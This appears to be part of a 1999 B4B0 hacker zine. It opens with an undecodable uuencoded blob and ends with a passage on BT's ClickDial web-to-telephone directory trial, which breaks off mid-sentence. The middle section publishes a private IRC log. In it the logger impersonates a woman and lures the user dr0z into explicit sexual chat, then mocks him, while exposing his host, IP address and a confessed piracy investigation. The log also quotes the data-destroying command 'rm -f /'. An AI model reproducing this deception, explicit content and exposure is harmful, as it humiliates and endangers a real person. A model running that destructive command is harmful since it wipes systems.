M*!+"W0]-)"@NMN[HCQN7"-$-0-#><QX/>6R59A?;>_S#"8M<Q2C78MDO<$F)
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
D,WVFS_29/M-G^DR?Z3-]IL_TF3[39_K\B#[_'VOX5H$`N`$`
`
end

B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0
[!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.3.][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!]
B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0

"All my life, I've always wanted the substance that I found lacking...
The need. The desire. With B4B0, I have all that."

- Anthony Michael Hall, 1998

B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0
[!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.4.][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!]
B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0

RETURN OF THE IRC LOGS by nop

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

>>> You are now known as B_Furrow
[dr0z(pyco@pm3-19-15.apex.net)] y0 y0 y0
[msg(dr0z)] hi
[dr0z(pyco@pm3-19-15.apex.net)] =]
[msg(dr0z)] remember someone deleted my hard drive?
[msg(dr0z)] they rm -f /
<dr0z> i got slack 3.5 installed
<dr0z> =[
<dr0z> waiting for my 9 cd's from cheapbytes
[dr0z(pyco@pm3-19-15.apex.net)] i dunno
[dr0z(pyco@pm3-19-15.apex.net)] i havn't been here in forever
<dr0z> win2k, blah
[msg(dr0z)] ohh
[msg(dr0z)] whoa
[msg(dr0z)] I am horny
[msg(dr0z)] :o)
[dr0z(pyco@pm3-19-15.apex.net)] i lost my computer for like 7-9 months
[dr0z(pyco@pm3-19-15.apex.net)] =[
[msg(dr0z)] how?
[dr0z(pyco@pm3-19-15.apex.net)] under investigation for software pirating,
and my parents grounded my ass for a while, just got back online like
4 weeks ago
[dr0z(pyco@pm3-19-15.apex.net)] keep it quite, nobody know but u
[msg(dr0z)] o ok
[msg(dr0z)] hey are you into cyber sex?
[dr0z(pyco@pm3-19-15.apex.net)] they didn't find shit
[dr0z(pyco@pm3-19-15.apex.net)] i threw all my shit away
[msg(dr0z)] :O)
[dr0z(pyco@pm3-19-15.apex.net)] formatted my hd too
[dr0z(pyco@pm3-19-15.apex.net)] =]
[dr0z(pyco@pm3-19-15.apex.net)] cops come and got it, it sucked a nut
[msg(dr0z)] dr0z
[msg(dr0z)] do you like cyber sex?
[dr0z(pyco@pm3-19-15.apex.net)] they had it forever and never looked at it
probably, they probably never figured out anything since all it had was
slackware on it
[dr0z(pyco@pm3-19-15.apex.net)] not really
[dr0z(pyco@pm3-19-15.apex.net)] y?
[msg(dr0z)] do you want to have cyber sex?
[dr0z(pyco@pm3-19-15.apex.net)] i like pictures =]
[msg(dr0z)] dont tell anybody.
[dr0z(pyco@pm3-19-15.apex.net)] ?
[msg(dr0z)] well not in irc HEHEHEHE :O)
[msg(dr0z)] ??
[msg(dr0z)] well do ya?
[dr0z(pyco@pm3-19-15.apex.net)] don't tell anyone what?
[msg(dr0z)] that I asked.
[dr0z(pyco@pm3-19-15.apex.net)] no, not really.....i like pictures more
[msg(dr0z)] :(
[dr0z(pyco@pm3-19-15.apex.net)] oooohhh ok
[dr0z(pyco@pm3-19-15.apex.net)] sorry
ð dr0z kiss kiss
[msg(dr0z)] I will send you my pic :o)
[dr0z(pyco@pm3-19-15.apex.net)] okie
[dr0z(pyco@pm3-19-15.apex.net)] =]
[msg(dr0z)] have you seen it?
[dr0z(pyco@pm3-19-15.apex.net)] don't think so
[msg(dr0z)] ohh ok
[msg(dr0z)] people say I am ok
[msg(dr0z)] well not all people
[msg(dr0z)] I am kinda pudgie
<dr0z> anyone read the book: Cuckoo's Egg: Tracking a Spy through the maze
of computer espionage????
[msg(dr0z)] like in the waist
[dr0z(pyco@pm3-19-15.apex.net)] i like "thick" girls
[dr0z(pyco@pm3-19-15.apex.net)] i hate bony people
ùíù DCC You must supply a nickname and a filename for DCC send
ùíù DCC Cannot access: /home/nop/pr0nz/te01.jpg
[dr0z(pyco@pm3-19-15.apex.net)] send send
[dcc(SEND)] dr0z
ùíù DCC SEND connection with dr0z[209.250.43.222, port 3264]
established
[msg(dr0z)] I took this last week
[msg(dr0z)] my friend got me into cyber sex
ùíù DCC SEND:bio.jpg [12.13Kb] to dr0z completed in 19 secs (0.6385
Kb/sec)
[msg(dr0z)] so I kinda took some revealing pics
[msg(dr0z)] dont laugh at me :o(
[msg(dr0z)] and dont give it out
[dr0z(pyco@pm3-19-15.apex.net)] woah shit, your mof0 hot, damn girl
[msg(dr0z)] ?
[dr0z(pyco@pm3-19-15.apex.net)] i would fuck your shit up
[dr0z(pyco@pm3-19-15.apex.net)] damn
[msg(dr0z)] excuse me?
[dr0z(pyco@pm3-19-15.apex.net)] woohoo
[dr0z(pyco@pm3-19-15.apex.net)] ermmm.....you look awesome
[msg(dr0z)] I am fat
[dr0z(pyco@pm3-19-15.apex.net)] bs, no your not
[dr0z(pyco@pm3-19-15.apex.net)] got any more?
[msg(dr0z)] umm I think
[dr0z(pyco@pm3-19-15.apex.net)] i don't gots no revealing pics
[dr0z(pyco@pm3-19-15.apex.net)] =[
[dr0z(pyco@pm3-19-15.apex.net)] hmmm
[dr0z(pyco@pm3-19-15.apex.net)] scan my butt
[dr0z(pyco@pm3-19-15.apex.net)] =]
[dr0z(pyco@pm3-19-15.apex.net)] hehe
[dcc(SEND)] dr0z
ùíù DCC SEND connection with dr0z[209.250.43.222, port 3265]
established
[msg(dr0z)] ok this one is a bit more revealing
[msg(dr0z)] HEHEHE
[msg(dr0z)] just a bit
[dr0z(pyco@pm3-19-15.apex.net)] koolio
ùíù DCC SEND:bio2.jpg [15.7Kb] to dr0z completed in 11 secs (1.427
Kb/sec)
[dr0z(pyco@pm3-19-15.apex.net)] =]
[dr0z(pyco@pm3-19-15.apex.net)] u got a digital camera?
[msg(dr0z)] digital camera?
[dr0z(pyco@pm3-19-15.apex.net)] nm
[dr0z(pyco@pm3-19-15.apex.net)] damn, nice
[dr0z(pyco@pm3-19-15.apex.net)] u aren't even close to fat
[msg(dr0z)] really?
[msg(dr0z)] *blush*
[dr0z(pyco@pm3-19-15.apex.net)] whoever told u that is a dumbass
[msg(dr0z)] awww
[dr0z(pyco@pm3-19-15.apex.net)] =]
[msg(dr0z)] am I cyberable?
[dr0z(pyco@pm3-19-15.apex.net)] uh huh
[msg(dr0z)] ooo so you want to?
ð dr0z mouth is hanging opening, slobber dripping out now
[dr0z(pyco@pm3-19-15.apex.net)] hmmmm
[dr0z(pyco@pm3-19-15.apex.net)] sure
\xf9\xed\xf9 B_Furrow [script@ws-206-171-90-29.nine2five.com] has joined #eeeek
\xf9\xed\xf9 [Users(#eeeek:1)]
[@B_Furrow ]
\xf9\xed\xf9 Channel #eeeek was created at Fri Aug 13 01:39:45 1999
\xf9\xed\xf9 ^BBitchX^B: Join to #eeeek was synced in 0.531 secs!!
[dr0z(pyco@pm3-19-15.apex.net)] =o
ùíù mode/#eeeek [+i] by B_Furrow
>>> Inviting dr0z to #eeeek
!irc.uddf.net B_Furrow invited dr0z into #eeeek.
>>> You are now known as BioVirus
[msg(dr0z)] hello?
[dr0z(pyco@pm3-19-15.apex.net)] oh
[dr0z(pyco@pm3-19-15.apex.net)] hehehe
>>> Inviting dr0z to #eeeek
!irc.uddf.net BioVirus invited dr0z into #eeeek.
ùíù Mode change [-w] for user BioVirus
[dr0z(pyco@pm3-19-15.apex.net)] me got a hard-on now
[msg(dr0z)] well join the channel
[dr0z(pyco@pm3-19-15.apex.net)] got any more pictures? like of your ass
[msg(dr0z)] nope sorry :(
[dr0z(pyco@pm3-19-15.apex.net)] dern
[msg(dr0z)] tomorrow I will scan more
[dr0z(pyco@pm3-19-15.apex.net)] what channel?
ùíù mode/#eeeek [-i] by BioVirus
[msg(dr0z)] #eeeek
ùíù dr0z [pyco@pm3-19-15.apex.net] has joined #eeeek
<BioVirus> hi
<dr0z> hey
ùíù mode/#eeeek [+pi] by BioVirus
<BioVirus> are you ready?
<dr0z> uh huh
<BioVirus> take off your pants
<dr0z> i'm new to this, remember that
<dr0z> okie, hold on
<BioVirus> so am I :O)
<dr0z> ok done
<BioVirus> how big is your cock?
<BioVirus> truthfully
<dr0z> hard?
<BioVirus> yes
<BioVirus> ohh my god
<dr0z> 6 1/2 or 7 inches
<BioVirus> my pussy is so wet
<BioVirus> dr0z: good you dont lie :o)
<dr0z> =]
ð BioVirus goes down on your cock
<dr0z> ooo
ð BioVirus sucks slowly
<dr0z> ooo yea
ð BioVirus sticks her tounge in your head hole
ð BioVirus licks your cock from the bottom up slowly
<dr0z> mmm
<BioVirus> so ar eyou doing it?
<dr0z> am i doing what?
<BioVirus> duh
<dr0z> jackering?
<BioVirus> yes
<dr0z> oh yea, i am
<BioVirus> so what do I get?
<dr0z> ok
<dr0z> take your shirt off
<BioVirus> ok
<BioVirus> my nipples are hard
ð dr0z grasps your breasts, and licks all around the nipples slowly
<BioVirus> ohhhh
ð dr0z takes his hand and caresses the insides of your thighs
ð BioVirus wants you to go down on me
<BioVirus> dont cum yet
ð dr0z goes from the breasts down to your pussy, licking the whole way down
<BioVirus> are you going to cum soon?
ð dr0z sticks his long pointy tounge in your tight little pussy
<dr0z> no this soon
<BioVirus> oooo
ð BioVirus gets on top of dr0z to ride
<BioVirus> FAST
<BioVirus> and hard
ð dr0z takes his fingers and caresses the lips of your pussy
<BioVirus> I want you to jerk harder
<BioVirus> and faster
<dr0z> oh hell yea
<BioVirus> I am fingering myself hard
<BioVirus> ohh my I feel it coming soon
<BioVirus> are you close?
<dr0z> me too
<BioVirus> do it faster
<dr0z> k
<BioVirus> tell me when you cum
<BioVirus> ohh god I want to taste your cum
<dr0z> i just came
<BioVirus> ohh my
<BioVirus> taste it
<BioVirus> taste what I want to taste
<dr0z> ok
<BioVirus> dr0z
<dr0z> its ok.
<BioVirus> its soooooo good
>>> You are now known as ron
ð ron whips out his long hard cock
ð ron sticks it up dr0z's asshole
<ron> OOOOOOOOOOO
<ron> OMG BOY
<ron> this is good ass
<ron> tight shit
<ron> uNF
<ron> uNF
<ron> uNF
<ron> uNF
<ron> mUahHAHAHqaHA

B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0
[!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.4.][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!]
B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0

-] BT ClickDial
-] Web-Enabled CTI
-] - gr1p

For more information on CTI as a general concept and its implementing ideas
I'd recommend checking out Hybrid's text file on CTI, released under 9x last
year, the url is at the end of this text. For even more info regarding CTI
how about searching altavista? :)

BT docz > *
ciao.

--> Introduction

BT devised the wonderful idea of combining CTI (Computer Telephony
Intergration) with the Internet to create a WWW/CTI which would provide
access to a wide variety of data including telephone directorys. The ideas
behind this were trialed at BTL (British Telecom Laboratories) to test the
concepts and usability of the service.

The basic idea BT has is to take their existing Directory Database,
Teamconnect, which is currently accessable via HTML on BT Intranet and
intergrate the HTML-based information with the CTI layer to enable calls
to be dialled and answered at the click of a mouse. The Teamconnect
Directory contains the contact information for BT employees, including PSTN
and BTnet telephone numbers, pager and fax numbers, e-mail addresses and
physical location. This directory, with added ClickDial features is shown
in click1.jpg in the attachment of this text. The link between the intranet
page and the telephone is taken by the CTI service, named ClickDial, this
then takes the telephone number information from the webpage and turns this
into a call request to the appropriate telephony equipment ie. PBX, giving
it instructions to set-up a call.

--> ClickDial Users and Registration

From click1.jpg its pretty obvious to see how this is implemented via an
easy to understand point'n'click enviroment. The user types the name of
the person they are looking for via any of the search engines implemented
into the Teamconnect Directory. On a directory listing, such as Eric
Allard's (Devel. Manager, IP Engineering) listing in click1.jpg you will
see that the numbers are listed in numeric form, next to a ClickDial button,
which is obviously where the WWW/CTI Intergration plays its part.

For BT Employees to use ClickDial they must be registered, which can be
achieved from the intranet webpage, but as yet, registration is not open
to everyone. BT conducted a trial at the Main Lab Block @ BT Labs with
a random selection of 1000 lines being accepted and allowed to register.
The registration details etc. are shown in click2.jpg and click3.jpg,
click2.jpg shows the Trial registration screen with click3.jpg showing
the screen of a registered user on the ClickDial system. To register
the user must obtain there 9 digit registration number which is given
to them via the webpage when they request registration to the service.
They are then asked to call the ClickDial Registration line which answers..

"BT Clickdial. Using your Telephone keypad please enter the 9 digit
registration number appearing on your screen"

If the user was among the random selected 1000 numbers clickdial services
would be registered from their line. Some users who tried to register were
turned down for not having a suitable line or PBX for ClickDial services.

When the registration line is called a CTI application answers the call,
plays the above BT announcement and reads the 9 digits the user is entering
via an Interactive Voice Response Unit (IVR), this then determines the
Calling Line Identity (CLI) of the user and then passes the 9 digit number
and the CLI to the ClickDial server. If the server recieves a valid CLI
and a 9 digit number which matches the one sent out by the browser the CLI
identifies the telephone to be associated with that browser meaning that
the user must use the browser and telephone simultaneously which is meant
to prohibit security violations of ClickDial. A database allows PBX's to
be identified from BT's Internal CLI's. Multiple registration requests
from the same browser also need to be recognised. This is done by including
